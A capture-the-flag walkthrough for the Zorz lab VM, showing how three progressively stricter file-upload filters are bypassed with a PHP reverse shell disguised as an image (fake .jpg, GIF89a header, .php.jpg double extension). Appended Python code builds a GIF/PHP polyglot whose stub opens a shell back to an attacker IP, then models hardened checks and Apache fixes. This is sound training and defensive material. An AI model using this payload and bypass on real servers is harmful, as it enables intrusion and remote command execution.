Hack the Zorz VM (CTF Challenge)


Zorz is another VM that will challenge your web application skills. There are three separate challenges (web pages) on this machine, and it should be fairly straightforward: each page is a file-upload form with a progressively stricter filter, and your goal is to successfully upload a web shell or other malicious file to the server.
This machine (Zorz) does not run on VMware. So, if you are running your Kali Linux attacking box in VMware, you will probably need to run Zorz on a different system in VirtualBox, and of course on the same network.
You can download this machine from here: https://www.vulnhub.com/?q=zorz&sort=date-des&type=vm
Penetration Methodologies:
§  Network scanning (netdiscover, nmap)
§  Exploiting each level of the file-upload vulnerability
§  Directory brute-force attack (dirb)
§  Obtaining a netcat session for each level

Walkthrough
Let’s start with our all time favourite netdiscover to get the victim machine’s IP.
netdiscover


So, our target is located at 192.168.1.129. Let’s quickly do an nmap scan to get an idea of the open ports.
nmap -A 192.168.1.129



OK, so we have port 22 (SSH) and port 80 (HTTP) open. Let’s visit the IP in our browser.


And it opened up like a beautiful treasure! As you can see, this web page has a “Contact Support” form where we can attach a file and describe our problem.
So, here is what we did.
Copy the stock reverse shell that ships with Kali: /usr/share/webshells/php/php-reverse-shell.php
Open it in a text editor, set the listening IP ($ip) and port ($port) to your attacking machine, save the file as php-reverse-shell.jpg, and start netcat listening on that port.





Next we try to upload this file, and our shell gets uploaded successfully.

But we have no idea where our file was stored on the server. To find the location (directory) of our shell, we run dirb with the wordlist /usr/share/dirb/wordlists/big.txt:
dirb http://192.168.1.129 /usr/share/dirb/wordlists/big.txt

Dirb reveals a directory named “uploads2”. On visiting it we do not find our uploaded file there, so we guess at the naming scheme and visit “uploads1” instead, where the file is listed. Click the uploaded shell to execute it.


We have successfully bypassed the level 1 filter, and a netcat session is waiting for us on the listener we started earlier:
nc -lvp 1234


Now let’s go for the second level (Zorz Image Uploader 2) and try uploading the same file there.

This time we get an error: only images with a .jpg, .png or .gif extension may be uploaded.


Time for some more tricks. Open php-reverse-shell.php in a text editor and, just before the opening <?php tag, add the GIF file signature “GIF89a” so that a magic-byte check (such as PHP’s getimagesize()) sees a valid image header. Then rename the file to “php-reverse-shell.php.jpg” and try to upload it once again. The double extension satisfies a filter that only looks at the trailing .jpg, and on an Apache host where the PHP handler is bound with AddHandler, the .php in the middle of the name is typically still enough for the file to be executed as PHP (we cannot see Zorz’s configuration, but the result below is consistent with that).

And this time it uploads successfully!


Time to execute the backdoor; this time the file is in “uploads2”. Let’s open it.

As you can see, we get a new netcat session and have compromised the victim’s VM once again:
nc -lvp 1234

Now for our final task, we open the third level (Zorz Image Uploader 3). Here a note clearly states the accepted file type: the upload must be an image with a .jpeg, .jpg or .png extension and smaller than 100 KB.

Without any further edits to our modified “php-reverse-shell.php” file, we try uploading it here. The file (well under 100 KB) uploads successfully once again, and this time the directory it has been stored in is uploads3.


Let’s visit the /uploads3 directory to execute the uploaded backdoor and obtain a netcat session once more.
As you can see, we again get a new netcat session and have compromised the victim’s VM:
nc -lvp 1234
Mission accomplished. We have successfully bypassed all three levels of upload filtering on this machine.
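The three filters above (a trusted Content-Type, an extension whitelist plus magic-byte check, and the same plus a size limit) and the GIF89a/.php.jpg polyglot that walks through them can be modelled offline. The following Python is an added example written for this write-up, not code from the Zorz VM or from the original post: the three level_N_check functions are guesses at the kind of check each level performs (the VM’s source is not shown on the page), the PHP stub is a minimal reverse-shell one-liner rather than pentestmonkey’s script, and the attacker IP and port are placeholders. apache_runs_as_php() models the multiple-extension behaviour of Apache’s AddHandler that makes a .php.jpg file execute, and hardened_check() shows the checks a defender would apply instead.

```python
"""Model of Zorz-style upload filters versus a GIF89a-prefixed .php.jpg polyglot.
Constructed example: the check functions are assumptions about each level, not
the VM's actual code."""
import secrets

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
MAX_BYTES = 100 * 1024                      # level-3 limit stated on the page
IMAGE_MAGIC = (b"GIF89a", b"GIF87a",        # real GIF signatures
               b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")


def build_polyglot(lhost: str, lport: int) -> bytes:
    """GIF header followed by a minimal PHP reverse-shell stub (placeholder
    payload). A magic-byte check such as getimagesize() sees a GIF; the PHP
    engine ignores the bytes before <?php and runs the code anyway."""
    php = ("<?php\n"
           f"$s = fsockopen('{lhost}', {lport});\n"
           "proc_open('/bin/sh -i', array(0 => $s, 1 => $s, 2 => $s), $p);\n"
           "?>")
    return b"GIF89a\n" + php.encode()


def has_image_magic(data: bytes) -> bool:
    return any(data.startswith(m) for m in IMAGE_MAGIC)


def level1_check(content_type: str) -> bool:
    """Level 1 as modelled here: trusts the client-supplied Content-Type header."""
    return content_type.lower().startswith("image/")


def level2_check(filename: str, data: bytes) -> bool:
    """Level 2 as modelled here: whitelisted trailing extension plus magic bytes."""
    ext = filename.lower().rsplit(".", 1)[-1]
    return ext in ALLOWED_EXT and has_image_magic(data)


def level3_check(filename: str, data: bytes) -> bool:
    """Level 3 as modelled here: the level-2 checks plus the 100 KB size limit."""
    return level2_check(filename, data) and len(data) < MAX_BYTES


def apache_runs_as_php(filename: str) -> bool:
    """Why x.php.jpg still executes: with `AddHandler ... .php`, Apache mod_mime
    applies the handler if *any* extension in the name is .php, not only the last."""
    return "php" in (seg.lower() for seg in filename.split(".")[1:])


def hardened_check(filename: str, data: bytes) -> bool:
    """Defensive version: exactly one extension, taken from the end of the name,
    whitelisted; size and magic enforced; no PHP open tag anywhere in the body."""
    base, dot, ext = filename.rpartition(".")
    if not dot or "." in base or ext.lower() not in ALLOWED_EXT:
        return False
    if len(data) > MAX_BYTES or not has_image_magic(data):
        return False
    return b"<?" not in data        # cheap tripwire; the real fix is server config


def stored_name(filename: str) -> str:
    """Never reuse the client's filename: random name, server-chosen extension."""
    return secrets.token_hex(16) + "." + filename.rpartition(".")[2].lower()


if __name__ == "__main__":
    shell = build_polyglot("192.168.1.7", 1234)      # placeholder attacker IP/port
    name = "php-reverse-shell.php.jpg"
    print("level1 (Content-Type only):", level1_check("image/jpeg"))
    print("level2 (.php.jpg + GIF89a):", level2_check(name, shell))
    print("level3 (+size limit):      ", level3_check(name, shell))
    print("Apache hands it to PHP:    ", apache_runs_as_php(name))
    print("hardened_check rejects it: ", not hardened_check(name, shell))
    print("stored as:                 ", stored_name(name))
```

The tripwire in hardened_check() is defence in depth only; the fix that actually closes the hole is to bind the PHP handler with SetHandler inside a FilesMatch "\.php$" block (or equivalent) so that only a trailing .php is executed, to store uploads outside the web root or in a directory with script execution disabled, and to serve them under a server-generated name as stored_name() does.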
